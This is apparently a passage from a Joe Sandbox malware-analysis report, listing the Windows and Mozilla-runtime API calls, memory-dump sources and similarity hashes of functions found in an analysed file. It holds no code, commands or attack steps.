                                    • Instruction Fuzzy Hash: C73170B5A043059FD704CF14D884A9FBBE4FF89314F00442EE85A97741DB30E919CB96
                                    APIs
                                    • memset.MSVCRT ref: 00198F8B
                                      • Part of subcall function 001987F0: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00198FBE,00000000), ref: 001987FB
                                      • Part of subcall function 001987F0: RtlAllocateHeap.NTDLL(00000000), ref: 00198802
                                      • Part of subcall function 001987F0: wsprintfW.USER32 ref: 00198818
                                    • OpenProcess.KERNEL32(00001001,00000000,?), ref: 0019904B
                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 00199069
                                    • CloseHandle.KERNEL32(00000000), ref: 00199076
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                    Similarity
                                    • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                                    • String ID:
                                    • API String ID: 3729781310-0
                                    • Opcode ID: 5487b02c265ea8c672d22d500aefe7283f61fa5200ae1845ab110086ddb8510c
                                    • Instruction ID: c4d5a847981634a96c523f92e7d931a92a0bf90bbfa63ae3260933955300d9f7
                                    • Opcode Fuzzy Hash: 5487b02c265ea8c672d22d500aefe7283f61fa5200ae1845ab110086ddb8510c
                                    • Instruction Fuzzy Hash: FD314971A00208AFDF14DBE4DD49BEDB7B8AB59300F244058F606AB194DBB4AA48CB51
                                    APIs
                                    • GetCurrentThreadId.KERNEL32 ref: 6C68B4F5
                                    • AcquireSRWLockExclusive.KERNEL32(6C6FF4B8), ref: 6C68B502
                                    • ReleaseSRWLockExclusive.KERNEL32(6C6FF4B8), ref: 6C68B542
                                    • free.MOZGLUE(?), ref: 6C68B578
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true
                                    • Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                    Similarity
                                    • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
                                    • String ID:
                                    • API String ID: 2047719359-0
                                    • Opcode ID: 6e0f6bef24dc2f61200e8a3930d0bf8d745664f2b2fab1b4d47885a7b685e6e3
                                    • Instruction ID: d55229c5b2bbc01055727b3fa1eb0a56c1de7e1df98d6b283b10ed2c20b5d493
                                    • Opcode Fuzzy Hash: 6e0f6bef24dc2f61200e8a3930d0bf8d745664f2b2fab1b4d47885a7b685e6e3
                                    • Instruction Fuzzy Hash: 5A11D231A04B41C7D3118F2AD8407A5B3B2FFDB319F10570AD89953A02EBB1A5C5C7AE
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,001A0DD0,00000000,?), ref: 00197450
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00197457
                                    • GetLocalTime.KERNEL32(?,?,?,?,?,001A0DD0,00000000,?), ref: 00197464
                                    • wsprintfA.USER32 ref: 00197493
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                    Similarity
                                    • API ID: Heap$AllocateLocalProcessTimewsprintf
                                    • String ID:
                                    • API String ID: 377395780-0
                                    • Opcode ID: 9719ee201b48ee8a7dac11fd68c6754cef295e321cd4f5d84d185f82f38c757a
                                    • Instruction ID: c79bc07056b2b5a1e65f5ba245878e4ab54a145e130dda3b02fcf61ce75d9721
                                    • Opcode Fuzzy Hash: 9719ee201b48ee8a7dac11fd68c6754cef295e321cd4f5d84d185f82f38c757a
                                    • Instruction Fuzzy Hash: A611FAB2914118ABCB14DBD9DD45FBEB7BCFB4DB11F10411AF606A2680D7795940C7B0
                                    APIs
                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,6C67F20E,?), ref: 6C6B3DF5
                                    • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(6C67F20E,00000000,?), ref: 6C6B3DFC
                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C6B3E06
                                    • fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,00000000), ref: 6C6B3E0E
                                      • Part of subcall function 6C6ACC00: GetCurrentProcess.KERNEL32(?,?,6C6731A7), ref: 6C6ACC0D
                                      • Part of subcall function 6C6ACC00: TerminateProcess.KERNEL32(00000000,00000003,?,?,6C6731A7), ref: 6C6ACC16
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true
                                    • Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                    Similarity
                                    • API ID: Process__acrt_iob_func$CurrentTerminatefputcfputs
                                    • String ID:
                                    • API String ID: 2787204188-0
                                    • Opcode ID: 094cc1598978bde7a2655d0ef85eb07bc4313b2b4bd87792bbbbbee648dce3d3
                                    • Instruction ID: 75a290f735dadd7c9327a839e024858a507899518fc83a019e54c306ad85e626
                                    • Opcode Fuzzy Hash: 094cc1598978bde7a2655d0ef85eb07bc4313b2b4bd87792bbbbbee648dce3d3
                                    • Instruction Fuzzy Hash: 59F012B16402087FD700AB55EC81DAB376DDB47624F050021FE1957741D636BE2686FF
                                    APIs
                                    • CreateFileA.KERNEL32(001935FE,80000000,00000003,00000000,00000003,00000080,00000000,?,001935FE,?), ref: 00198D9C
                                    • GetFileSizeEx.KERNEL32(000000FF,001935FE), ref: 00198DB9
                                    • CloseHandle.KERNEL32(000000FF), ref: 00198DC7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                    Similarity
                                    • API ID: File$CloseCreateHandleSize
                                    • String ID:
                                    • API String ID: 1378416451-0
                                    • Opcode ID: 3e76de8c8c57a8bb4daf9e66239c91bfa4e53ac39a9c3110da4c4fe67b135f7a
                                    • Instruction ID: fa78781b6eaa9c9c30b8a0a7c53f64ee54047285f3c1b42127f5086829ef1548
                                    • Opcode Fuzzy Hash: 3e76de8c8c57a8bb4daf9e66239c91bfa4e53ac39a9c3110da4c4fe67b135f7a
                                    • Instruction Fuzzy Hash: 38F0EC35E54208BBDB19DBF5DC49F9E77F9AB59711F108658F611A72C0EA70A6008B40
                                    APIs
                                    • __getptd.LIBCMT ref: 0019C13D
                                      • Part of subcall function 0019B95F: __amsg_exit.LIBCMT ref: 0019B96F
                                    • __getptd.LIBCMT ref: 0019C154
                                    • __amsg_exit.LIBCMT ref: 0019C162
                                    • __updatetlocinfoEx_nolock.LIBCMT ref: 0019C186
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                    Similarity
                                    • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                    • String ID:
                                    • API String ID: 300741435-0
                                    • Opcode ID: c38dc0498bd6c2ec06834b8ce9d071ba81dfa7fcce4ad2c8f13386e9dcd78f77
                                    • Instruction ID: effea6b0cb37d062c80ceee003799d6de342b73ac66b65c34ece805ee7a15587
                                    • Opcode Fuzzy Hash: c38dc0498bd6c2ec06834b8ce9d071ba81dfa7fcce4ad2c8f13386e9dcd78f77
                                    • Instruction Fuzzy Hash: 36F0B432988310DBDF20BB78984375D37906F21724F954219F494A72E3CBA45840DBDA
                                    APIs
                                    • ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(00000000,?,?,?,?), ref: 6C67BDEB
                                    • ?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6C67BE8F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true
                                    • Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                    Similarity
                                    • API ID: String$Builder@2@@Converter@double_conversion@@Double$CreateDecimalHandleRepresentation@SpecialValues@
                                    • String ID: 0
                                    • API String ID: 2811501404-4108050209
                                    • Opcode ID: 0665df0fdab35cd1dc20d6c95c15b04168aede084a4b6dac7b535e061fa18fba
                                    • Instruction ID: 5405e39e928d43517768fb48cea97d215a68dec3859e8a366a425583ca1b4252
                                    • Opcode Fuzzy Hash: 0665df0fdab35cd1dc20d6c95c15b04168aede084a4b6dac7b535e061fa18fba
                                    • Instruction Fuzzy Hash: 8241AF71909745CFC321CF28C481A9BB7E4AFCA388F104E1DF98597711E73099498BAA
                                    APIs
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C6B3D19
                                    • mozalloc_abort.MOZGLUE(?), ref: 6C6B3D6C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true
                                    • Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                    Similarity
                                    • API ID: _errnomozalloc_abort
                                    • String ID: d
                                    • API String ID: 3471241338-2564639436
                                    • Opcode ID: 5155f0066a790a4c97cf7239ec208bd179e835c11012df392e71ca918102982b
                                    • Instruction ID: 2ac950583305eebf2d7cfddfd5d919bbc4549abf67941512d37082b37cdca2c9
                                    • Opcode Fuzzy Hash: 5155f0066a790a4c97cf7239ec208bd179e835c11012df392e71ca918102982b
                                    • Instruction Fuzzy Hash: C211E635F08648DBDB008F69CC544EDB7B5EF8A318F448229D9556B602EF30A594C358
                                    APIs
                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_DISABLE_WALKTHESTACK), ref: 6C6D6E22
                                    • __Init_thread_footer.LIBCMT ref: 6C6D6E3F
                                    Strings
                                    • MOZ_DISABLE_WALKTHESTACK, xrefs: 6C6D6E1D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true
                                    • Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                    Similarity
                                    • API ID: Init_thread_footergetenv
                                    • String ID: MOZ_DISABLE_WALKTHESTACK
                                    • API String ID: 1472356752-1153589363
                                    • Opcode ID: e81fcc4c8327824d038be25f8a1f3eda9beba984b7355ca2d94826c7de75df98
                                    • Instruction ID: 42f6c6c444465a5fcbb1850d3696925d13f3e2c668186a882d7c248f208fc7ea
                                    • Opcode Fuzzy Hash: e81fcc4c8327824d038be25f8a1f3eda9beba984b7355ca2d94826c7de75df98
                                    • Instruction Fuzzy Hash: 79F024712082428BDB008B6AE8D2A8977B35313318F050565C42186B61CF21F907CE9F
                                    APIs
                                    • moz_xmalloc.MOZGLUE(0Kkl,?,6C6B4B30,80000000,?,6C6B4AB7,?,6C6743CF,?,6C6742D2), ref: 6C686C42
                                      • Part of subcall function 6C68CA10: malloc.MOZGLUE(?), ref: 6C68CA26
                                    • moz_xmalloc.MOZGLUE(0Kkl,?,6C6B4B30,80000000,?,6C6B4AB7,?,6C6743CF,?,6C6742D2), ref: 6C686C58
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true
                                    • Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                    Similarity
                                    • API ID: moz_xmalloc$malloc
                                    • String ID: 0Kkl
                                    • API String ID: 1967447596-1873664643
                                    • Opcode ID: 26e400adbc4dd1962c0462c652a8f496a88607757228c19233f06711ec6135b5
                                    • Instruction ID: 2e4e7c6975ee3e1990aad6bf5d593c523e8b20b9b682b7a7945fd5eea9956236
                                    • Opcode Fuzzy Hash: 26e400adbc4dd1962c0462c652a8f496a88607757228c19233f06711ec6135b5
                                    • Instruction Fuzzy Hash: B0E086F1A265055A9B08997CAC4956A71C89B153A87044A3AE823C6BC8FA98E590817D
                                    APIs
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,6C6CB2C9,?,?,?,6C6CB127,?,?,?,?,?,?,?,?,?,6C6CAE52), ref: 6C6CB628
                                      • Part of subcall function 6C6C90E0: free.MOZGLUE(?,00000000,?,?,6C6CDEDB), ref: 6C6C90FF
                                      • Part of subcall function 6C6C90E0: free.MOZGLUE(?,00000000,?,?,6C6CDEDB), ref: 6C6C9108
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6C6CB2C9,?,?,?,6C6CB127,?,?,?,?,?,?,?,?,?,6C6CAE52), ref: 6C6CB67D
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6C6CB2C9,?,?,?,6C6CB127,?,?,?,?,?,?,?,?,?,6C6CAE52), ref: 6C6CB708
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,6C6CB127,?,?,?,?,?,?,?,?), ref: 6C6CB74D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true
                                    • Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                    Similarity
                                    • API ID: freemalloc
                                    • String ID:
                                    • API String ID: 3061335427-0
                                    • Opcode ID: cfbaecc6b1e6a2093cf2f3054561f1a08e97e8461b00ffedd98b3dcad4a1e6d3
                                    • Instruction ID: c70f350c5f6f31d5a44318969ca7ac2b46316eb4bdaefc345ef2fcb3e766e7d6
                                    • Opcode Fuzzy Hash: cfbaecc6b1e6a2093cf2f3054561f1a08e97e8461b00ffedd98b3dcad4a1e6d3
                                    • Instruction Fuzzy Hash: 2F51DCB1B052168FDB14CF19C9847AEB7B5FF85309F05852DCC5AAB700DB31A814CBAA